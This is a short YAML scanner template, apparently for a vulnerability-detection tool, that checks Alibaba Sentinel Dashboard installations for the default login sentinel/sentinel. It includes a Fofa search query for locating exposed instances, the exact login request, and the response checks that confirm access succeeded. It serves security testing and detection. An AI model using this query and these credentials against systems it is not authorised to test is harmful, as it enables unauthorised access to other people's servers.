漏洞描述
Fofa: app="Sentinel-Dashboard"
id: alibaba-sentinel-default-user
info:
name: Alibaba Sentinel 默认用户
author: zan8in
severity: high
verified: true
description: |-
Fofa: app="Sentinel-Dashboard"
tags: alibaba,sentinel,default-user
created: 2024/01/07
rules:
r0:
request:
method: POST
path: /auth/login?password=sentinel&username=sentinel
headers:
Authorization: "Basic Og=="
expression: response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"code":0') && response.body.bcontains(b'"msg":"success"')
expression: r0()